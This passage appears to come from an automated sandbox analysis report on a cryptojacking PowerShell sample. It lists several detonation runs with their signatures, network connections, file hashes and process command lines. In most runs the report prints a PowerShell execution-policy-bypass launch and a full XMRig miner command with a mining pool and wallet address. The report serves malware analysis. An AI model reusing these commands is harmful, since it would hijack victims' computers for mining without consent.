| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4888 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4888 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bns0flaf.u12.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:24
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1779s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3052 wrote to memory of 5016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3052 wrote to memory of 5016 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xwaudfzl.onm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:26
Platform
win10v2004-20240426-en
Max time kernel
1800s
Max time network
1781s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3572 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3572 wrote to memory of 796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwp5425k.lif.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:25
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
Network
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:26
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2232 wrote to memory of 660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvxvpglx.3ub.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:27
Platform
win11-20240426-en
Max time kernel
1788s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 2444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfz52wzz.10l.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:23
Platform
win10v2004-20240426-en
Max time kernel
1791s
Max time network
1767s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4428 wrote to memory of 4628 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4utxyqzr.skj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4628-103-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-104-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-105-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-106-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-107-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-108-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-109-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-110-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-111-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-112-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-113-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-114-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-115-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-116-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-117-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
memory/4628-118-0x00007FF6B2690000-0x00007FF6B32C3000-memory.dmp
Analysis: behavioral7
Detonation Overview
| Field | Value |
